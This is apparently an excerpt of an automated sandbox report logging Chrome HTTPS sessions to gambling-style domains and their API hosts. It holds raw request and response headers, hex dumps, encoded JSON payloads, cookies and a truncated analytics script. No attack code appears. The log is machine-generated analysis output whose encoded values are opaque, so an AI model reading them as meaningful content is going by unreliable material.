                                                                                                                                                          2024-06-09 22:41:11 UTC484OUTData Raw: 6a 73 6f 6e 3d 70 77 76 7c 31 33 7c 58 55 7a 49 44 52 53 7a 64 44 44 6e 4b 6e 43 7a 42 30 4c 77 4f 74 58 70 56 76 68 33 52 6e 66 32 51 6a 51 78 4c 52 56 35 44 44 48 6b 5a 77 56 75 57 73 53 69 4e 70 77 6d 64 32 35 77 67 41 41 61 54 75 4b 76 42 30 57 74 49 67 4e 63 4b 6d 4b 6c 4b 68 47 6d 43 6c 5a 78 5a 78 4b 70 46 52 50 79 63 32 54 73 5a 6c 47 70 47 30 53 61 54 75 4c 6a 71 61 35 68 56 55 57 30 65 56 35 71 6d 79 35 6c 58 56 52 62 4e 77 55 79 41 6c 49 72 47 68 54 78 42 45 57 6a 7a 42 47 7a 42 71 54 6e 57 30 54 64 56 30 45 69 52 6e 49 63 6c 69 53 77 4b 6a 4b 61 44 45 48 6d 4e 69 64 6d 4b 44 4a 6f 54 77 4b 6a 51 65 41 61 54 75 4c 30 6f 4d 54 74 46 51 4e 63 49 57 58 42 48 52 47 7a 4c 57 41 52 48 77 56 75 53 63 53 69 52 62 42 6c 4f 6c 56 66 71 62 31 77 6d 6f 50
                                                                                                                                                          Data Ascii: json=pwv|13|XUzIDRSzdDDnKnCzB0LwOtXpVvh3Rnf2QjQxLRV5DDHkZwVuWsSiNpwmd25wgAAaTuKvB0WtIgNcKmKlKhGmClZxZxKpFRPyc2TsZlGpG0SaTuLjqa5hVUW0eV5qmy5lXVRbNwUyAlIrGhTxBEWjzBGzBqTnW0TdV0EiRnIcliSwKjKaDEHmNidmKDJoTwKjQeAaTuL0oMTtFQNcIWXBHRGzLWARHwVuScSiRbBlOlVfqb1wmoP
                                                                                                                                                          2024-06-09 22:41:11 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:11 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:11 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 31 31 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:11 GMT
                                                                                                                                                          2024-06-09 22:41:11 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/plain;charset=utf-8
                                                                                                                                                          2024-06-09 22:41:11 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:11 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:11 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 31 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 1
                                                                                                                                                          2024-06-09 22:41:11 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:11 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 35 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp15)
                                                                                                                                                          2024-06-09 22:41:11 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          373192.168.2.550128103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:11 UTC669OUTPOST /mt-cloud/api/sn.maintain.list HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Content-Length: 304
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: application/json, text/plain, */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Origin: https://xpj723.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:11 UTC304OUTData Raw: 6a 73 6f 6e 3d 25 37 42 25 32 32 69 64 25 32 32 25 33 41 25 32 32 31 37 39 37 32 38 36 37 34 34 32 34 33 39 25 32 32 25 32 43 25 32 32 6a 73 6f 6e 72 70 63 25 32 32 25 33 41 25 32 32 32 2e 30 25 32 32 25 32 43 25 32 32 6d 65 74 68 6f 64 25 32 32 25 33 41 25 32 32 73 6e 2e 6d 61 69 6e 74 61 69 6e 2e 6c 69 73 74 25 32 32 25 32 43 25 32 32 70 61 72 61 6d 73 25 32 32 25 33 41 25 37 42 25 32 32 73 6e 25 32 32 25 33 41 25 32 32 6c 6c 31 32 25 32 32 25 32 43 25 32 32 74 65 72 6d 69 6e 61 6c 25 32 32 25 33 41 31 25 32 43 25 32 32 68 6f 73 74 25 32 32 25 33 41 25 32 32 78 70 6a 37 32 33 2e 63 63 25 32 32 25 32 43 25 32 32 66 69 6e 67 65 72 4f 53 4d 6f 64 65 6c 25 32 32 25 33 41 25 32 32 43 68 72 6f 6d 65 25 32 30 31 31 37 2e 30 2e 30 2e 30 25 32 30 25 37 43 25 32
                                                                                                                                                          Data Ascii: json=%7B%22id%22%3A%2217972867442439%22%2C%22jsonrpc%22%3A%222.0%22%2C%22method%22%3A%22sn.maintain.list%22%2C%22params%22%3A%7B%22sn%22%3A%22ll12%22%2C%22terminal%22%3A1%2C%22host%22%3A%22xpj723.cc%22%2C%22fingerOSModel%22%3A%22Chrome%20117.0.0.0%20%7C%2
                                                                                                                                                          2024-06-09 22:41:11 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:11 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:11 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 31 31 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:11 GMT
                                                                                                                                                          2024-06-09 22:41:11 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/plain;charset=utf-8
                                                                                                                                                          2024-06-09 22:41:11 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:11 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:11 UTC37INData Raw: 56 61 72 79 3a 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 4d 65 74 68 6f 64 0d 0a
                                                                                                                                                          Data Ascii: Vary: Access-Control-Request-Method
                                                                                                                                                          2024-06-09 22:41:11 UTC38INData Raw: 56 61 72 79 3a 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 48 65 61 64 65 72 73 0d 0a
                                                                                                                                                          Data Ascii: Vary: Access-Control-Request-Headers
                                                                                                                                                          2024-06-09 22:41:11 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:11 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 30 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          374192.168.2.550127103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:11 UTC663OUTPOST /zb-cloud/pwv/agent.code HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Content-Length: 488
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: application/json, text/plain, */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Origin: https://xpj723.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:11 UTC488OUTData Raw: 6a 73 6f 6e 3d 70 77 76 7c 31 33 7c 41 42 67 57 43 57 57 67 68 59 4a 62 57 67 49 76 4e 30 54 6c 48 6a 45 6d 4f 76 68 33 52 6e 66 32 51 6a 51 30 4b 78 65 61 45 54 48 6b 5a 7a 43 62 4b 72 58 6d 55 74 72 73 72 32 35 69 7a 47 57 6d 42 6a 44 6c 49 30 54 6d 49 67 4e 63 4b 6d 4b 6c 4b 68 47 6d 43 6c 5a 78 5a 61 52 77 54 51 55 63 6a 32 58 6e 46 7a 53 69 4d 30 4f 6d 42 6a 45 68 56 32 4b 76 7a 5a 35 6f 66 32 51 6f 54 54 47 77 48 55 5a 45 57 46 56 70 6b 4a 5a 72 42 4b 31 68 51 56 42 6f 54 51 4e 4c 4b 49 64 58 4a 50 58 7a 56 44 39 79 43 56 6f 65 4a 52 47 77 4b 4a 4f 4f 56 47 5a 67 68 42 55 74 42 68 50 62 45 63 58 67 4a 44 4a 6e 4a 4f 4a 5a 59 55 45 76 68 32 34 70 4c 6d 53 6c 4b 30 43 6a 4e 7a 4b 66 6e 51 56 67 4d 4e 42 62 58 42 51 46 43 4a 53 76 64 51 57 6e 62 52 6c
                                                                                                                                                          Data Ascii: json=pwv|13|ABgWCWWghYJbWgIvN0TlHjEmOvh3Rnf2QjQ0KxeaETHkZzCbKrXmUtrsr25izGWmBjDlI0TmIgNcKmKlKhGmClZxZaRwTQUcj2XnFzSiM0OmBjEhV2KvzZ5of2QoTTGwHUZEWFVpkJZrBK1hQVBoTQNLKIdXJPXzVD9yCVoeJRGwKJOOVGZghBUtBhPbEcXgJDJnJOJZYUEvh24pLmSlK0CjNzKfnQVgMNBbXBQFCJSvdQWnbRl
                                                                                                                                                          2024-06-09 22:41:11 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:11 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:11 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 31 31 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:11 GMT
                                                                                                                                                          2024-06-09 22:41:11 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/plain;charset=utf-8
                                                                                                                                                          2024-06-09 22:41:11 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:11 UTC39INData Raw: 76 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 2c 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: vary: Accept-Encoding,Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:11 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 33 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 3
                                                                                                                                                          2024-06-09 22:41:11 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 36 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp16)
                                                                                                                                                          2024-06-09 22:41:11 UTC32INData Raw: 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: access-control-allow-origin: *
                                                                                                                                                          2024-06-09 22:41:11 UTC82INData Raw: 78 2d 76 69 61 3a 20 31 2e 31 20 61 77 73 3a 6a 70 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 2c 20 31 2e 31 20 6f 63 73 61 70 69 3a 30 30 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 0d 0a
                                                                                                                                                          Data Ascii: x-via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          375192.168.2.55014223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:11 UTC380OUTGET /pc/image-pc/index/383/menu/menubg.jpg HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:11 UTC616INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:11 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 2606
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:20 GMT
                                                                                                                                                          ETag: "64bf926c-a2e"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[3],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE30[6],EU-FRA-paris-GLOBAL1-CACHE18[0,TCP_HIT,0],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2464738
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 8c1327f602d3f05d79b70bdf3361827d
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 127262
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:11 UTC2606INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 90 07 80 03 01 11 00 02 11 01 03 11 01 ff c4 00 17 00 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 07 ff c4 00 16 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 03 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 e5 f9 ec 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)==================================================


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          376192.168.2.550146170.33.9.2274434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:11 UTC506OUTGET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=js326.cc&terminal=1&r=6219241436 HTTP/1.1
                                                                                                                                                          Host: ahd-ocssn.qqxgo.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          Cookie: aliyungf_tc=3de529fcf893d6d3ee212d9780b2d6d818dae7d7247c306b9d3885f4ac9f9c38
                                                                                                                                                          2024-06-09 22:41:12 UTC399INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:12 GMT
                                                                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Tengine/2.3.0
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          api-elapsed: 5
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          x-server: AkamaiNetStorage(jp15)
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          2024-06-09 22:41:12 UTC1098INData Raw: 34 34 33 0d 0a 7b 22 61 6e 61 6c 79 74 69 63 73 43 6f 64 65 22 3a 22 28 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 2c 20 63 2c 20 64 2c 20 65 2c 20 6a 2c 20 73 29 20 7b 20 20 20 20 20 20 20 20 20 61 5b 64 5d 20 3d 20 61 5b 64 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 20 20 20 20 20 20 20 20 20 20 20 20 28 61 5b 64 5d 2e 61 20 3d 20 61 5b 64 5d 2e 61 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 20 20 20 20 20 20 20 20 20 7d 3b 20 20 20 20 20 20 20 20 20 6a 20 3d 20 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 63 29 2c 20 20 20 20 20 20 20 20 20 20 20 20 20 73 20 3d 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 63 29 5b 30 5d 3b 20 20 20 20 20 20 20 20 20 6a 2e 61 73 79 6e 63 20 3d 20 74 72 75 65
                                                                                                                                                          Data Ascii: 443{"analyticsCode":"(function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async = true
                                                                                                                                                          2024-06-09 22:41:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          377192.168.2.55008938.174.148.434434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:11 UTC656OUTGET /index/getAppsUrl.html?device=android&fPixelId=&accessToken=&apiVersion= HTTP/1.1
                                                                                                                                                          Host: x551005.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: */*
                                                                                                                                                          X-Requested-With: XMLHttpRequest
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          Cookie: route=61ee84c9f68236309da705261df10e5a
                                                                                                                                                          2024-06-09 22:41:11 UTC21INHTTP/1.1 605 unknow
                                                                                                                                                          2024-06-09 22:41:11 UTC44INData Raw: 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 32 35 39 32 30 30 30 0d 0a
                                                                                                                                                          Data Ascii: Strict-Transport-Security: max-age=2592000
                                                                                                                                                          2024-06-09 22:41:11 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 31 31 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:11 GMT
                                                                                                                                                          2024-06-09 22:41:11 UTC60INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 72 6f 75 74 65 3d 32 39 63 36 32 36 64 34 65 38 38 34 66 65 34 33 30 31 65 62 36 62 35 36 62 34 64 35 36 39 38 31 3b 20 50 61 74 68 3d 2f 0d 0a
                                                                                                                                                          Data Ascii: Set-Cookie: route=29c626d4e884fe4301eb6b56b4d56981; Path=/
                                                                                                                                                          2024-06-09 22:41:11 UTC19INData Raw: 68 65 61 64 65 72 53 74 61 74 75 73 3a 20 36 30 35 0d 0a
                                                                                                                                                          Data Ascii: headerStatus: 605
                                                                                                                                                          2024-06-09 22:41:11 UTC23INData Raw: 69 70 53 74 72 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 0d 0a
                                                                                                                                                          Data Ascii: ipStr: 173.254.250.91
                                                                                                                                                          2024-06-09 22:41:11 UTC29INData Raw: 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a
                                                                                                                                                          Data Ascii: X-Frame-Options: SAMEORIGIN
                                                                                                                                                          2024-06-09 22:41:11 UTC36INData Raw: 58 2d 43 61 63 68 65 3a 20 4d 49 53 53 20 66 72 6f 6d 20 63 64 6e 2d 53 74 61 72 6c 69 6e 6b 2d 4b 52 0d 0a
                                                                                                                                                          Data Ascii: X-Cache: MISS from cdn-Starlink-KR
                                                                                                                                                          2024-06-09 22:41:11 UTC19INData Raw: 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a
                                                                                                                                                          Data Ascii: Content-Length: 0
                                                                                                                                                          2024-06-09 22:41:11 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                                                          Data Ascii: Connection: close
                                                                                                                                                          2024-06-09 22:41:11 UTC2INData Raw: 0d 0a
                                                                                                                                                          Data Ascii:


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          378192.168.2.550152188.114.96.34434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:11 UTC525OUTGET /wasm_exec.js HTTP/1.1
                                                                                                                                                          Host: stt-wasm.ai4funs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:11 UTC860INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:11 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Cache-Control: public, max-age=14400, must-revalidate
                                                                                                                                                          ETag: W/"cb86ea27dd7c6c898f98d617d86fb707"
                                                                                                                                                          referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                                          x-robots-tag: nosnippet
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CGOx5SWCPNPx5Hr8zkvQCQE%2BGVKCALe7S3kwKNYUbcGCt1utclKA5dEBDjEfFH%2FXF05pz%2FABOUszeu4%2BPaPVWRDhHx3RxaQWnGjKy%2B%2Bdsp9GEkba2n81jXf%2FQdg4NGM%2FmmqUvbJ8ig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                          Age: 440
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8914a0aea9c04770-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
